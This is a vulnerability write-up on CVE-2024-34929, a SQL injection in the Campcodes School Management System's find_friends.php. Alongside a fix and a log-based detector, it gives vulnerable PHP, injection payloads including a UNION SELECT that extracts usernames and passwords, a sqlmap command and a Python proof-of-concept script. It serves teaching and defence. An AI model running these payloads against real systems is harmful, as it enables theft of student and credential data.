In early 2024, a critical security vulnerability was disclosed in the Campcodes Complete Web-Based School Management System 1. Identified as CVE-2024-34929, this flaw exposes a serious SQL Injection risk through the my_index parameter of the find_friends.php file. In simple terms, an attacker can manipulate the application's database queries and potentially retrieve sensitive information, modify data, or even take control of the web application's backend database.
This write-up will show what the vulnerability looks like, how it can be exploited, and what can be done to stay protected. We'll include a proof-of-concept exploit and explain each step so you can understand how attacks work in the real world.
- Product: Campcodes Complete Web-Based School Management System 1.
- Vulnerable File: /view/find_friends.php
- Vulnerability Type: SQL Injection (CWE-89)
- CVE: CVE-2024-34929
- Original Disclosure:
  - Exploit Database #52275
  - Patchstack Advisory
How does it work?
The vulnerable parameter, my_index, is concatenated directly into a SQL query without sanitization or parameterization. This means an attacker can inject SQL syntax through the request and change the query the database actually runs.
Vulnerable code example (PHP)
```php
<?php
// ...previous code...

// The raw GET value is interpolated into the query string with no validation
// and no parameter binding, which is the root cause of CVE-2024-34929.
$my_index = $_GET['my_index'];
$sql = "SELECT * FROM students WHERE student_index = '$my_index'";

// ...rest of the code...
?>
```
Notice how $my_index is taken straight from user input and dropped inside a SQL string. This is a recipe for trouble.
Step-by-Step Exploit
Let’s walk through exploiting this issue with a proof-of-concept.
1. Confirming the Injection Point

You notice or are told about a GET request like this:

```http
GET /view/find_friends.php?my_index=1234
```

Trying a basic injection:

```http
GET /view/find_friends.php?my_index=1234' OR '1'='1
```

If you see a change in results, bingo! SQL injection is working.
2. Enumerating Database Data
To extract data step by step, you can use a common trick like UNION SELECT. Here's a sample payload that fetches usernames and passwords (assuming the table and fields are named users, username, and password):

```http
GET /view/find_friends.php?my_index=1234' UNION SELECT 1,username,password,4 FROM users-- -
```

*In real testing, you may have to guess the number of columns by adjusting the number of placeholder values until you no longer get an error.*
3. Automating the Attack with SQLMap
SQLMap is a tool that automates the detection and exploitation of SQL injection.

Command:

```sh
sqlmap -u "http://victim.site/view/find_friends.php?my_index=1234" --dbs
```

This will list all databases, proving the site is vulnerable.
For a quick Python script that demonstrates the issue:

```python
import requests

base_url = "http://target.site/view/find_friends.php"
payload = "1' OR 1=1-- -"

r = requests.get(base_url, params={"my_index": payload})

if "student_index" in r.text:  # Adjust this string to fit the real output
    print("[+] SQL Injection worked! Here's part of the response:")
    print(r.text[:100])
else:
    print("[-] No luck.")
```
Example fix (using PDO in PHP)
```php
$my_index = $_GET['my_index'];

// A prepared statement sends the query and the value separately, so the
// database never interprets the contents of my_index as SQL syntax.
$stmt = $pdo->prepare("SELECT * FROM students WHERE student_index = ?");
$stmt->execute([$my_index]);
```
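Alongside the fix, defenders usually want to know whether this endpoint has already been probed. The following is an added example (not code from the original write-up or from the Campcodes project): a small Python scanner over constructed Apache-style access-log lines that flags requests to /view/find_friends.php whose my_index value is not a plain numeric index. The numeric-index format and the log format are assumptions for this example.

```python
import re
import urllib.parse

# Constructed sample access-log lines (Apache combined format), for illustration only.
SAMPLE_LOG = """\
203.0.113.10 - - [23/May/2024:17:20:01 +0000] "GET /view/find_friends.php?my_index=1234 HTTP/1.1" 200 5120
203.0.113.10 - - [23/May/2024:17:20:05 +0000] "GET /view/find_friends.php?my_index=1234%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 91240
203.0.113.10 - - [23/May/2024:17:20:09 +0000] "GET /view/find_friends.php?my_index=1234%27%20UNION%20SELECT%201%2Cusername%2Cpassword%2C4%20FROM%20users--%20- HTTP/1.1" 200 7700
198.51.100.7 - - [23/May/2024:17:21:00 +0000] "GET /view/index.php HTTP/1.1" 200 300
"""

# Minimal parser for the combined log format: client IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d+) (?P<size>\d+)'
)

# Assumption: a legitimate student index is a short run of digits.
VALID_INDEX = re.compile(r'^\d{1,10}$')

# Tokens that commonly show up when a quoted string parameter is being injected.
SQLI_TOKENS = re.compile(
    r"('|--|/\*|\bunion\b|\bselect\b|\bor\b\s+\S+=|\bsleep\s*\(|\bbenchmark\s*\()", re.I
)

VULNERABLE_PATH = "/view/find_friends.php"


def find_friends_alerts(log_text):
    """Return (client ip, decoded my_index value, reason) for suspicious requests."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parsed = urllib.parse.urlsplit(m.group("url"))
        if parsed.path != VULNERABLE_PATH:
            continue
        # parse_qs percent-decodes the value, so encoded quotes and spaces are visible.
        query = urllib.parse.parse_qs(parsed.query, keep_blank_values=True)
        for value in query.get("my_index", []):
            if VALID_INDEX.match(value):
                continue
            reason = "sqli-token" if SQLI_TOKENS.search(value) else "malformed-index"
            alerts.append((m.group("ip"), value, reason))
    return alerts


if __name__ == "__main__":
    for ip, value, reason in find_friends_alerts(SAMPLE_LOG):
        print(f"{ip} my_index={value!r} ({reason})")
```

Requests whose my_index is merely malformed are reported separately from those carrying SQL tokens, so the same scan surfaces both scanner noise and targeted probes against this endpoint.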
References
- NVD: CVE-2024-34929
- Exploit-DB #52275
- Patchstack Advisory
- OWASP SQL Injection Cheat Sheet
Conclusion
CVE-2024-34929 is a classic but severe SQL Injection affecting thousands of possible deployments of this school system. Exploiting it is straightforward for attackers and can lead to stolen data, compromised systems, or worse. Always sanitize inputs and use prepared statements — never trust user input.
*Stay safe, keep your code clean, and if you use the Campcodes School Management System, update or patch today!*
Timeline
Published on: 05/23/2024 17:15:29 UTC
Last modified on: 08/01/2024 13:52:26 UTC